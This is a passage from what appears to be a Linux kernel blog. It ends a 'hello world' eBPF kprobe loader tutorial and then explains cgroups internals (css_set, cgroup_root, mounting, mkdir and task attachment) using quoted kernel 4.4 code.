<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208# echo 'p:sys_clone sys_clone' >> /sys/kernel/debug/tracing/kprobe_events
root@192:/home/test/linux-4.9.208/linux-4.9.208# cat /sys/kernel/debug/tracing/events/kprobes/sys_clone/id
1254
</code></pre></div></div>
<h3> Write a loader </h3>
<p>The source code of loader is as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _GNU_SOURCE
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <linux/version.h>
#include <linux/perf_event.h>
#include <linux/hw_breakpoint.h>
#include <errno.h>
int main()
{
int bfd;
unsigned char buf[1024] = {};
struct bpf_insn *insn;
union bpf_attr attr = {};
unsigned char log_buf[4096] = {};
int ret;
int efd;
int pfd;
int n;
int i;
struct perf_event_attr pattr = {};
bfd = open("./test_bpf", O_RDONLY);
if (bfd < 0)
{
printf("open eBPF program error: %s\n", strerror(errno));
exit(-1);
}
n = read(bfd, buf, 1024);
for (i = 0; i < n; ++i)
{
printf("%02x ", buf[i]);
if (i % 8 == 0)
printf("\n");
}
close(bfd);
insn = (struct bpf_insn*)buf;
attr.prog_type = BPF_PROG_TYPE_KPROBE;
attr.insns = (unsigned long)insn;
attr.insn_cnt = n / sizeof(struct bpf_insn);
attr.license = (unsigned long)"GPL";
attr.log_size = sizeof(log_buf);
attr.log_buf = (unsigned long)log_buf;
attr.log_level = 1;
attr.kern_version = 264656;
pfd = syscall(SYS_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
if (pfd < 0)
{
printf("bpf syscall error: %s\n", strerror(errno));
printf("log_buf = %s\n", log_buf);
exit(-1);
}
pattr.type = PERF_TYPE_TRACEPOINT;
pattr.sample_type = PERF_SAMPLE_RAW;
pattr.sample_period = 1;
pattr.wakeup_events = 1;
pattr.config = 1254;
pattr.size = sizeof(pattr);
efd = syscall(SYS_perf_event_open, &pattr, -1, 0, -1, 0);
if (efd < 0)
{
printf("perf_event_open error: %s\n", strerror(errno));
exit(-1);
}
ret = ioctl(efd, PERF_EVENT_IOC_ENABLE, 0);
if (ret < 0)
{
printf("PERF_EVENT_IOC_ENABLE error: %s\n", strerror(errno));
exit(-1);
}
ret = ioctl(efd, PERF_EVENT_IOC_SET_BPF, pfd);
if (ret < 0)
{
printf("PERF_EVENT_IOC_SET_BPF error: %s\n", strerror(errno));
exit(-1);
}
while(1);
}
</code></pre></div></div>
<p>Something notice:</p>
<ol>
<li>
<p>I first tried loading the eBPF program as ‘BPF_PROG_TYPE_TRACEPOINT’ and attaching it to the syscalls tracepoints, but that didn’t work. I was quite confused about this until I read
https://github.com/iovisor/bcc/issues/748 . So I switched to a kprobe.</p>
</li>
<li>
<p>The ‘attr.kern_version’ value is taken from ‘LINUX_VERSION_CODE’ in the linux-4.9.208/usr/include/linux/version.h file.</p>
</li>
<li>
<p>The final ‘while’ loop keeps the process alive so the eBPF program stays loaded. There are proper ways to pin a program, but I use ‘while’ to keep things simple.</p>
</li>
</ol>
<p>Before we execute the ‘test_loader’, we first read ‘/sys/kernel/debug/tracing/trace_pipe’ in Terminal 1; this is where the ‘bpf_trace_printk’ output goes.</p>
<p>Then run the ‘test_loader’ in Terminal 2, and we can see the following output in Terminal 1:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208# cat /sys/kernel/debug/tracing/trace_pipe
bash-13708 [003] d... 51890.256702: : Hello World!
bash-13708 [001] d... 51905.890740: : Hello World!
bash-13708 [000] d... 52578.776651: : Hello World!
gnome-shell-1429 [000] d... 52581.579554: : Hello World!
gnome-shell-1429 [001] d... 52582.922830: : Hello World!
gnome-shell-13773 [000] d... 52582.937085: : Hello World!
</code></pre></div></div>
cgroups internals2020-01-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/01/05/cgroup-internlas
<h3> Concepts </h3>
<p>Control groups provide a mechanism to group processes/tasks in order to control their behaviour (to limit resources, for example). Some of the concepts:</p>
<p>cgroup: a set of tasks with a set of parameters for one or more subsystems.</p>
<p>subsystem: a resource controller that schedules a resource or applies per-cgroup limits.</p>
<p>hierarchy: a set of cgroups arranged in a tree. Every task in the system is in exactly one of the cgroups in the hierarchy and a set of subsystems.</p>
<p>Cgroups are one of the fundamental mechanisms used by docker. This post digs into how cgroups are implemented, based on kernel 4.4.</p>
<h3> Basic structure </h3>
<p>task_struct has a ‘cgroups’ field which points to a ‘struct css_set’ containing the process’s cgroup information.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct css_set {
/* Reference count */
atomic_t refcount;
/*
* List running through all cgroup groups in the same hash
* slot. Protected by css_set_lock
*/
struct hlist_node hlist;
/*
* Lists running through all tasks using this cgroup group.
* mg_tasks lists tasks which belong to this cset but are in the
* process of being migrated out or in. Protected by
* css_set_rwsem, but, during migration, once tasks are moved to
* mg_tasks, it can be read safely while holding cgroup_mutex.
*/
struct list_head tasks;
struct list_head mg_tasks;
/*
* List of cgrp_cset_links pointing at cgroups referenced from this
* css_set. Protected by css_set_lock.
*/
struct list_head cgrp_links;
/* the default cgroup associated with this css_set */
struct cgroup *dfl_cgrp;
/*
* Set of subsystem states, one for each subsystem. This array is
* immutable after creation apart from the init_css_set during
* subsystem registration (at boot time).
*/
struct cgroup_subsys_state *subsys[CGROUP_SUBSYS_COUNT];
/*
* List of csets participating in the on-going migration either as
* source or destination. Protected by cgroup_mutex.
*/
struct list_head mg_preload_node;
struct list_head mg_node;
/*
* If this cset is acting as the source of migration the following
* two fields are set. mg_src_cgrp is the source cgroup of the
* on-going migration and mg_dst_cset is the destination cset the
* target tasks on this cset should be migrated to. Protected by
* cgroup_mutex.
*/
struct cgroup *mg_src_cgrp;
struct css_set *mg_dst_cset;
/*
* On the default hierarhcy, ->subsys[ssid] may point to a css
* attached to an ancestor instead of the cgroup this css_set is
* associated with. The following node is anchored at
* ->subsys[ssid]->cgroup->e_csets[ssid] and provides a way to
* iterate through all css's attached to a given cgroup.
*/
struct list_head e_cset_node[CGROUP_SUBSYS_COUNT];
/* all css_task_iters currently walking this cset */
struct list_head task_iters;
/* dead and being drained, ignore for migration */
bool dead;
/* For RCU-protected deletion */
struct rcu_head rcu_head;
};
</code></pre></div></div>
<p>The ‘mg_*’ fields are used to migrate processes from one group to another.
‘hlist’ links all ‘css_set’s that fall into the same hashtable slot.
‘tasks’ links all of the processes using this ‘css_set’.
‘cgrp_links’ links ‘cgrp_cset_link’ structures, which connect a ‘css_set’ with a ‘cgroup’.
‘subsys’ is an array of pointers to ‘cgroup_subsys_state’; a ‘cgroup_subsys_state’ is the per-subsystem control data structure.</p>
<p>‘cgroup_subsys_state’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cgroup_subsys_state {
/* PI: the cgroup that this css is attached to */
struct cgroup *cgroup;
/* PI: the cgroup subsystem that this css is attached to */
struct cgroup_subsys *ss;
/* reference count - access via css_[try]get() and css_put() */
struct percpu_ref refcnt;
/* PI: the parent css */
struct cgroup_subsys_state *parent;
/* siblings list anchored at the parent's ->children */
struct list_head sibling;
struct list_head children;
/*
* PI: Subsys-unique ID. 0 is unused and root is always 1. The
* matching css can be looked up using css_from_id().
*/
int id;
unsigned int flags;
/*
* Monotonically increasing unique serial number which defines a
* uniform order among all csses. It's guaranteed that all
* ->children lists are in the ascending order of ->serial_nr and
* used to allow interrupting and resuming iterations.
*/
u64 serial_nr;
/*
* Incremented by online self and children. Used to guarantee that
* parents are not offlined before their children.
*/
atomic_t online_cnt;
/* percpu_ref killing and RCU release */
struct rcu_head rcu_head;
struct work_struct destroy_work;
};
</code></pre></div></div>
<p>The ‘struct cgroup’ member points to the ‘cgroup’ that the process is attached to.
The ‘cgroup_subsys’ member points to a specific subsystem.</p>
<p>In fact a ‘cgroup_subsys_state’ is embedded in each subsystem-specific cgroup structure. For example, the memory controller ‘mem_cgroup’ contains the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct mem_cgroup {
struct cgroup_subsys_state css;
/* Private memcg ID. Used to ID objects that outlive the cgroup */
struct mem_cgroup_id id;
/* Accounted resources */
struct page_counter memory;
struct page_counter memsw;
struct page_counter kmem;
...
}
</code></pre></div></div>
<p>The ‘css_set’s ‘subsys’ member points to the ‘mem_cgroup’s embedded ‘css’ field.</p>
<p>Following is the definition of ‘struct cgroup’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cgroup {
/* self css with NULL ->ss, points back to this cgroup */
struct cgroup_subsys_state self;
unsigned long flags; /* "unsigned long" so bitops work */
/*
* idr allocated in-hierarchy ID.
*
* ID 0 is not used, the ID of the root cgroup is always 1, and a
* new cgroup will be assigned with a smallest available ID.
*
* Allocating/Removing ID must be protected by cgroup_mutex.
*/
int id;
/*
* Each non-empty css_set associated with this cgroup contributes
* one to populated_cnt. All children with non-zero popuplated_cnt
* of their own contribute one. The count is zero iff there's no
* task in this cgroup or its subtree.
*/
int populated_cnt;
struct kernfs_node *kn; /* cgroup kernfs entry */
struct cgroup_file procs_file; /* handle for "cgroup.procs" */
struct cgroup_file events_file; /* handle for "cgroup.events" */
/*
* The bitmask of subsystems enabled on the child cgroups.
* ->subtree_control is the one configured through
* "cgroup.subtree_control" while ->child_subsys_mask is the
* effective one which may have more subsystems enabled.
* Controller knobs are made available iff it's enabled in
* ->subtree_control.
*/
unsigned int subtree_control;
unsigned int child_subsys_mask;
/* Private pointers for each registered subsystem */
struct cgroup_subsys_state __rcu *subsys[CGROUP_SUBSYS_COUNT];
struct cgroup_root *root;
/*
* List of cgrp_cset_links pointing at css_sets with tasks in this
* cgroup. Protected by css_set_lock.
*/
struct list_head cset_links;
/*
* On the default hierarchy, a css_set for a cgroup with some
* susbsys disabled will point to css's which are associated with
* the closest ancestor which has the subsys enabled. The
* following lists all css_sets which point to this cgroup's css
* for the given subsystem.
*/
struct list_head e_csets[CGROUP_SUBSYS_COUNT];
/*
* list of pidlists, up to two for each namespace (one for procs, one
* for tasks); created on demand.
*/
struct list_head pidlists;
struct mutex pidlist_mutex;
/* used to wait for offlining of csses */
wait_queue_head_t offline_waitq;
/* used to schedule release agent */
struct work_struct release_agent_work;
};
</code></pre></div></div>
<p>‘struct cgroup’ represents a concrete control group.
‘kn’ is the cgroup’s kernfs entry.
‘subsys’ is an array of pointers to ‘cgroup_subsys_state’; these represent the subsystems this cgroup contains.
‘cset_links’ links the cgroup to its ‘cgrp_cset_link’s.</p>
<p>A ‘css_set’ can be associated with multiple cgroups, and a ‘cgroup’ can be associated with multiple css_sets, as different tasks may belong to different cgroups on different hierarchies. This M:N relationship is represented by ‘struct cgrp_cset_link’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cgrp_cset_link {
/* the cgroup and css_set this link associates */
struct cgroup *cgrp;
struct css_set *cset;
/* list of cgrp_cset_links anchored at cgrp->cset_links */
struct list_head cset_link;
/* list of cgrp_cset_links anchored at css_set->cgrp_links */
struct list_head cgrp_link;
};
</code></pre></div></div>
<p>The following figure shows the data relations:</p>
<p><img src="/assets/img/cgroups/1.png" alt="" /></p>
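<p>As a hedged illustration of this M:N linking (simplified stand-ins for the kernel structures, with names suffixed ‘_sketch’; not the kernel API), one link object joins a single cgroup with a single css_set and sits on two lists at once:</p>

```c
#include <assert.h>
#include <stddef.h>

/* Simplified intrusive list, mimicking the kernel's list_head. */
struct list_head { struct list_head *next, *prev; };

static void init_list_head(struct list_head *h) { h->next = h->prev = h; }

static void list_add_tail_sketch(struct list_head *n, struct list_head *h)
{
    n->prev = h->prev;
    n->next = h;
    h->prev->next = n;
    h->prev = n;
}

struct cgroup_sketch  { struct list_head cset_links; };
struct css_set_sketch { struct list_head cgrp_links; };

struct cgrp_cset_link_sketch {
    struct cgroup_sketch  *cgrp;
    struct css_set_sketch *cset;
    struct list_head cset_link;   /* anchored at cgrp->cset_links */
    struct list_head cgrp_link;   /* anchored at cset->cgrp_links */
};

/* mirrors the shape of the kernel's link_css_set():
 * one link object, two list insertions */
static void link_css_set_sketch(struct cgrp_cset_link_sketch *link,
                                struct css_set_sketch *cset,
                                struct cgroup_sketch *cgrp)
{
    link->cgrp = cgrp;
    link->cset = cset;
    list_add_tail_sketch(&link->cset_link, &cgrp->cset_links);
    list_add_tail_sketch(&link->cgrp_link, &cset->cgrp_links);
}

/* helper: count entries on a list */
static int list_len(const struct list_head *h)
{
    int n = 0;
    for (const struct list_head *p = h->next; p != h; p = p->next)
        n++;
    return n;
}
```

<p>Walking cset->cgrp_links visits every cgroup the css_set belongs to, while walking cgrp->cset_links visits every css_set with tasks in that cgroup, mirroring the kernel’s iteration over these lists.</p>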
<h3> Cgroups initialization </h3>
<p>Early in ‘start_kernel’, the kernel calls ‘cgroup_init_early’ to initialize the subsystems that need early initialization, as indicated by the ‘early_init’ member of ‘struct cgroup_subsys’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int __init cgroup_init_early(void)
{
static struct cgroup_sb_opts __initdata opts;
struct cgroup_subsys *ss;
int i;
init_cgroup_root(&cgrp_dfl_root, &opts);
cgrp_dfl_root.cgrp.self.flags |= CSS_NO_REF;
RCU_INIT_POINTER(init_task.cgroups, &init_css_set);
for_each_subsys(ss, i) {
WARN(!ss->css_alloc || !ss->css_free || ss->name || ss->id,
"invalid cgroup_subsys %d:%s css_alloc=%p css_free=%p name:id=%d:%s\n",
i, cgroup_subsys_name[i], ss->css_alloc, ss->css_free,
ss->id, ss->name);
WARN(strlen(cgroup_subsys_name[i]) > MAX_CGROUP_TYPE_NAMELEN,
"cgroup_subsys_name %s too long\n", cgroup_subsys_name[i]);
ss->id = i;
ss->name = cgroup_subsys_name[i];
if (!ss->legacy_name)
ss->legacy_name = cgroup_subsys_name[i];
if (ss->early_init)
cgroup_init_subsys(ss, true);
}
return 0;
}
</code></pre></div></div>
<p>‘cgroup_init_early’ first initializes ‘cgrp_dfl_root’, the default ‘cgroup_root’. It is reserved for subsystems that are not attached to any mounted hierarchy; it has a single cgroup, and all tasks are part of that cgroup. Then it points ‘init_task.cgroups’ at ‘init_css_set’, so if we never use cgroups every process keeps ‘init_css_set’ as its ‘task_struct.cgroups’. Finally it iterates over all subsystems and calls ‘cgroup_init_subsys’ for those marked ‘early_init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __init cgroup_init_subsys(struct cgroup_subsys *ss, bool early)
{
struct cgroup_subsys_state *css;
printk(KERN_INFO "Initializing cgroup subsys %s\n", ss->name);
mutex_lock(&cgroup_mutex);
idr_init(&ss->css_idr);
INIT_LIST_HEAD(&ss->cfts);
/* Create the root cgroup state for this subsystem */
ss->root = &cgrp_dfl_root;
css = ss->css_alloc(cgroup_css(&cgrp_dfl_root.cgrp, ss));
/* We don't handle early failures gracefully */
BUG_ON(IS_ERR(css));
init_and_link_css(css, ss, &cgrp_dfl_root.cgrp);
...
init_css_set.subsys[ss->id] = css;
...
BUG_ON(online_css(css));
mutex_unlock(&cgroup_mutex);
}
</code></pre></div></div>
<p>‘cgroup_init_subsys’ first sets the ‘cgroup_subsys’s root to the default cgroup_root, then calls the subsystem’s css_alloc callback to allocate a ‘struct cgroup_subsys_state’. The parent css argument passed to css_alloc here is NULL, which lets the subsystem do special setup for the default cgroup_root. For example, the memory cgroup sets its limits to the maximum values.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct cgroup_subsys_state * __ref
mem_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
{
struct mem_cgroup *memcg;
long error = -ENOMEM;
int node;
memcg = mem_cgroup_alloc();
if (!memcg)
return ERR_PTR(error);
for_each_node(node)
if (alloc_mem_cgroup_per_zone_info(memcg, node))
goto free_out;
/* root ? */
if (parent_css == NULL) {
root_mem_cgroup = memcg;
mem_cgroup_root_css = &memcg->css;
page_counter_init(&memcg->memory, NULL);
memcg->high = PAGE_COUNTER_MAX;
memcg->soft_limit = PAGE_COUNTER_MAX;
page_counter_init(&memcg->memsw, NULL);
page_counter_init(&memcg->kmem, NULL);
}
...
}
</code></pre></div></div>
<p>After getting the ‘cgroup_subsys_state’, ‘cgroup_init_subsys’ calls ‘init_and_link_css’ to initialize it and ‘online_css’ to invoke the subsystem’s css_online callback.</p>
<p>In the second stage of initialization ‘cgroup_init’ it does more work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int __init cgroup_init(void)
{
struct cgroup_subsys *ss;
unsigned long key;
int ssid;
BUG_ON(percpu_init_rwsem(&cgroup_threadgroup_rwsem));
BUG_ON(cgroup_init_cftypes(NULL, cgroup_dfl_base_files));
BUG_ON(cgroup_init_cftypes(NULL, cgroup_legacy_base_files));
mutex_lock(&cgroup_mutex);
/* Add init_css_set to the hash table */
key = css_set_hash(init_css_set.subsys);
hash_add(css_set_table, &init_css_set.hlist, key);
BUG_ON(cgroup_setup_root(&cgrp_dfl_root, 0));
mutex_unlock(&cgroup_mutex);
for_each_subsys(ss, ssid) {
if (ss->early_init) {
struct cgroup_subsys_state *css =
init_css_set.subsys[ss->id];
css->id = cgroup_idr_alloc(&ss->css_idr, css, 1, 2,
GFP_KERNEL);
BUG_ON(css->id < 0);
} else {
cgroup_init_subsys(ss, false);
}
list_add_tail(&init_css_set.e_cset_node[ssid],
&cgrp_dfl_root.cgrp.e_csets[ssid]);
...
cgrp_dfl_root.subsys_mask |= 1 << ss->id;
if (!ss->dfl_cftypes)
cgrp_dfl_root_inhibit_ss_mask |= 1 << ss->id;
if (ss->dfl_cftypes == ss->legacy_cftypes) {
WARN_ON(cgroup_add_cftypes(ss, ss->dfl_cftypes));
} else {
WARN_ON(cgroup_add_dfl_cftypes(ss, ss->dfl_cftypes));
WARN_ON(cgroup_add_legacy_cftypes(ss, ss->legacy_cftypes));
}
if (ss->bind)
ss->bind(init_css_set.subsys[ssid]);
}
WARN_ON(sysfs_create_mount_point(fs_kobj, "cgroup"));
WARN_ON(register_filesystem(&cgroup_fs_type));
WARN_ON(!proc_create("cgroups", 0, NULL, &proc_cgroupstats_operations));
return 0;
}
</code></pre></div></div>
<p>First it calls ‘cgroup_init_cftypes’ to initialize two ‘struct cftype’ arrays, ‘cgroup_dfl_base_files’ and ‘cgroup_legacy_base_files’. A ‘cftype’ describes a cgroup control file and its handlers. ‘cgroup_dfl_base_files’ is for the default hierarchy and ‘cgroup_legacy_base_files’ is for the legacy hierarchies. In practice we usually only see the ‘cgroup_legacy_base_files’ files after boot, because Linux distros mount the legacy hierarchies for management.</p>
<p>Then ‘cgroup_init’ calculates the hash key of ‘init_css_set.subsys’ and inserts it into ‘css_set_table’, the hash table that holds every ‘css_set’.</p>
<p>‘cgroup_setup_root’ sets up a ‘cgroup_root’. This function is also called from ‘cgroup_mount’; the ‘ss_mask’ argument is the mask of subsystems to attach.</p>
<p>‘allocate_cgrp_cset_links’ allocates ‘css_set_count’ instances of ‘cgrp_cset_link’. These links are then used to connect every existing ‘css_set’ to the new ‘cgroup_root’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> hash_for_each(css_set_table, i, cset, hlist) {
link_css_set(&tmp_links, cset, root_cgrp);
if (css_set_populated(cset))
cgroup_update_populated(root_cgrp, true);
}
</code></pre></div></div>
<p>‘kernfs_create_root’ creates a new kernfs hierarchy; this becomes the root directory of the cgroup hierarchy. ‘css_populate_dir’ creates the control files in that root kernfs directory.</p>
<p>‘rebind_subsystems’ binds this ‘cgroup_root’ to the ‘cgroup_subsys’. The most important part is the following loop, which sets ‘ss->root’ to ‘dst_root’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for_each_subsys_which(ss, ssid, &ss_mask) {
struct cgroup_root *src_root = ss->root;
struct cgroup *scgrp = &src_root->cgrp;
struct cgroup_subsys_state *css = cgroup_css(scgrp, ss);
struct css_set *cset;
WARN_ON(!css || cgroup_css(dcgrp, ss));
css_clear_dir(css, NULL);
RCU_INIT_POINTER(scgrp->subsys[ssid], NULL);
rcu_assign_pointer(dcgrp->subsys[ssid], css);
ss->root = dst_root;
css->cgroup = dcgrp;
...
}
</code></pre></div></div>
<p>After rebinding the cgroup_subsys’s root, ‘cgroup_setup_root’ has nearly finished its job.</p>
<p>Let’s return to ‘cgroup_init’. It calls ‘cgroup_init_subsys’ to initialize each remaining subsystem, then sets the corresponding bit in ‘cgrp_dfl_root.subsys_mask’.</p>
<p>The following code adds the subsystem’s cftypes to the subsystem, linking them onto the ‘cgroup_subsys’s ‘cfts’ list head.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (ss->dfl_cftypes == ss->legacy_cftypes) {
WARN_ON(cgroup_add_cftypes(ss, ss->dfl_cftypes));
} else {
WARN_ON(cgroup_add_dfl_cftypes(ss, ss->dfl_cftypes));
WARN_ON(cgroup_add_legacy_cftypes(ss, ss->legacy_cftypes));
}
</code></pre></div></div>
<p>Finally, ‘cgroup_init’ creates the mount point at ‘/sys/fs/cgroup’ by calling ‘sysfs_create_mount_point’, registers ‘cgroup_fs_type’ so that userspace can mount the cgroup filesystem, and creates ‘/proc/cgroups’ to show cgroup status.</p>
<h3> Cgroups VFS </h3>
<p>At the end of ‘cgroup_init’, a new filesystem ‘cgroup_fs_type’ is registered. This is the cgroup fs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct file_system_type cgroup_fs_type = {
.name = "cgroup",
.mount = cgroup_mount,
.kill_sb = cgroup_kill_sb,
};
</code></pre></div></div>
<p>Every mount creates a new hierarchy, and one or more subsystems can be attached to it. From the code’s perspective, ‘cgroup_mount’ creates a ‘cgroup_root’ for one or more ‘cgroup_subsys’.</p>
<p>‘parse_cgroupfs_options’ parses the options passed to the mount system call and stores them in a ‘cgroup_sb_opts’ named opts; ‘opts.subsys_mask’ records the subsystems to attach to the new hierarchy.</p>
<p>Next, ‘cgroup_mount’ drains subsystems whose roots may still be dying from a previous unmount, restarting the syscall if it finds one:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for_each_subsys(ss, i) {
if (!(opts.subsys_mask & (1 << i)) ||
ss->root == &cgrp_dfl_root)
continue;
if (!percpu_ref_tryget_live(&ss->root->cgrp.self.refcnt)) {
mutex_unlock(&cgroup_mutex);
msleep(10);
ret = restart_syscall();
goto out_free;
}
cgroup_put(&ss->root->cgrp);
}
</code></pre></div></div>
<p>Next, ‘for_each_root(root)’ checks whether the requested subsystems are already mounted. If ‘root’ is ‘cgrp_dfl_root’, the subsystem is not mounted yet and the loop just continues. When subsystems are mounted more than once, the requests must match exactly:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if ((opts.subsys_mask || opts.none) &&
(opts.subsys_mask != root->subsys_mask)) {
if (!name_match)
continue;
ret = -EBUSY;
goto out_unlock;
}
</code></pre></div></div>
<p>This means, for example, that if we first mount cpu,cpuset at /sys/fs/cgroup/cpu,cpuset, we cannot later mount cpu or cpuset separately; we must again mount cpu,cpuset together in some directory. If the check passes, ‘kernfs_pin_sb’ is called to pin the already mounted superblock and we jump to out_unlock, which simply mounts the existing hierarchy at the new directory.</p>
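<p>The -EBUSY check quoted above reduces to a mask comparison. Here is a minimal sketch under assumed names (the mask bits and helper are illustrative, not the kernel’s): a live cgroup_root can only be re-mounted with exactly the same subsystem set.</p>

```c
#include <assert.h>
#include <errno.h>

/* Illustrative subsystem bits; real masks are built from CGROUP_SUBSYS_COUNT. */
#define SUBSYS_CPU    (1u << 0)
#define SUBSYS_CPUSET (1u << 1)

/* Returns 0 when the requested subsystem set matches what the existing
 * cgroup_root already holds (so the superblock can be reused), -EBUSY
 * when some subsystems are requested but the sets differ. */
static int check_existing_root(unsigned int requested_mask,
                               unsigned int root_subsys_mask)
{
    if (requested_mask && requested_mask != root_subsys_mask)
        return -EBUSY;
    return 0;
}
```

<p>With this rule, a hierarchy mounted as cpu,cpuset rejects a later attempt to mount cpu alone, matching the behavior described above.</p>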
<p>If instead the subsystems haven’t been mounted yet, we need to allocate and initialize a new ‘cgroup_root’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root = kzalloc(sizeof(*root), GFP_KERNEL);
if (!root) {
ret = -ENOMEM;
goto out_unlock;
}
init_cgroup_root(root, &opts);
ret = cgroup_setup_root(root, opts.subsys_mask);
if (ret)
cgroup_free_root(root);
out_unlock:
mutex_unlock(&cgroup_mutex);
out_free:
kfree(opts.release_agent);
kfree(opts.name);
if (ret)
return ERR_PTR(ret);
</code></pre></div></div>
<p>And finally mount the new kernfs to the directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dentry = kernfs_mount(fs_type, flags, root->kf_root,
CGROUP_SUPER_MAGIC, &new_sb);
if (IS_ERR(dentry) || !new_sb)
cgroup_put(&root->cgrp);
</code></pre></div></div>
<h3> Create a new cgroup </h3>
<p>When we create a directory under a hierarchy’s root directory, we create a new cgroup. The kernfs syscall ops are set to ‘cgroup_kf_syscall_ops’ in ‘cgroup_setup_root’, and the mkdir handler is ‘cgroup_mkdir’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct kernfs_syscall_ops cgroup_kf_syscall_ops = {
.remount_fs = cgroup_remount,
.show_options = cgroup_show_options,
.mkdir = cgroup_mkdir,
.rmdir = cgroup_rmdir,
.rename = cgroup_rename,
};
</code></pre></div></div>
<p>‘cgroup_mkdir’ first allocates and initializes a new ‘struct cgroup’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> cgrp = kzalloc(sizeof(*cgrp), GFP_KERNEL);
if (!cgrp) {
ret = -ENOMEM;
goto out_unlock;
}
ret = percpu_ref_init(&cgrp->self.refcnt, css_release, 0, GFP_KERNEL);
if (ret)
goto out_free_cgrp;
/*
* Temporarily set the pointer to NULL, so idr_find() won't return
* a half-baked cgroup.
*/
cgrp->id = cgroup_idr_alloc(&root->cgroup_idr, NULL, 2, 0, GFP_KERNEL);
if (cgrp->id < 0) {
ret = -ENOMEM;
goto out_cancel_ref;
}
init_cgroup_housekeeping(cgrp);
cgrp->self.parent = &parent->self;
cgrp->root = root;
</code></pre></div></div>
<p>It then creates the directory and populates the control files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kn = kernfs_create_dir(parent->kn, name, mode, cgrp);
if (IS_ERR(kn)) {
ret = PTR_ERR(kn);
goto out_free_id;
}
cgrp->kn = kn;
/*
* This extra ref will be put in cgroup_free_fn() and guarantees
* that @cgrp->kn is always accessible.
*/
kernfs_get(kn);
cgrp->self.serial_nr = css_serial_nr_next++;
/* allocation complete, commit to creation */
list_add_tail_rcu(&cgrp->self.sibling, &cgroup_parent(cgrp)->self.children);
atomic_inc(&root->nr_cgrps);
cgroup_get(parent);
/*
* @cgrp is now fully operational. If something fails after this
* point, it'll be released via the normal destruction path.
*/
cgroup_idr_replace(&root->cgroup_idr, cgrp, cgrp->id);
ret = cgroup_kn_set_ugid(kn);
if (ret)
goto out_destroy;
ret = css_populate_dir(&cgrp->self, NULL);
if (ret)
goto out_destroy;
</code></pre></div></div>
<p>Finally it creates and onlines a ‘cgroup_subsys_state’ for each enabled subsystem:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for_each_subsys(ss, ssid) {
if (parent->child_subsys_mask & (1 << ssid)) {
ret = create_css(cgrp, ss,
parent->subtree_control & (1 << ssid));
if (ret)
goto out_destroy;
}
}
</code></pre></div></div>
<h3> Attach process to a cgroup </h3>
<p>A process can be moved to a new cgroup by writing its pid to the cgroup’s cgroup.procs or tasks file. Let’s use the former as an example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct cftype cgroup_legacy_base_files[] = {
{
.name = "cgroup.procs",
.seq_start = cgroup_pidlist_start,
.seq_next = cgroup_pidlist_next,
.seq_stop = cgroup_pidlist_stop,
.seq_show = cgroup_pidlist_show,
.private = CGROUP_FILE_PROCS,
.write = cgroup_procs_write,
},
</code></pre></div></div>
<p>The actual work is done in ‘__cgroup_procs_write’, which calls ‘cgroup_attach_task’ to attach a task to a cgroup.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int cgroup_attach_task(struct cgroup *dst_cgrp,
struct task_struct *leader, bool threadgroup)
{
LIST_HEAD(preloaded_csets);
struct task_struct *task;
int ret;
/* look up all src csets */
spin_lock_bh(&css_set_lock);
rcu_read_lock();
task = leader;
do {
cgroup_migrate_add_src(task_css_set(task), dst_cgrp,
&preloaded_csets);
if (!threadgroup)
break;
} while_each_thread(leader, task);
rcu_read_unlock();
spin_unlock_bh(&css_set_lock);
/* prepare dst csets and commit */
ret = cgroup_migrate_prepare_dst(dst_cgrp, &preloaded_csets);
if (!ret)
ret = cgroup_migrate(leader, threadgroup, dst_cgrp);
cgroup_migrate_finish(&preloaded_csets);
return ret;
}
</code></pre></div></div>
<p>I won’t go into the details of these calls. The key path is ‘cgroup_migrate’->’cgroup_taskset_migrate’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> list_for_each_entry(cset, &tset->src_csets, mg_node) {
list_for_each_entry_safe(task, tmp_task, &cset->mg_tasks, cg_list) {
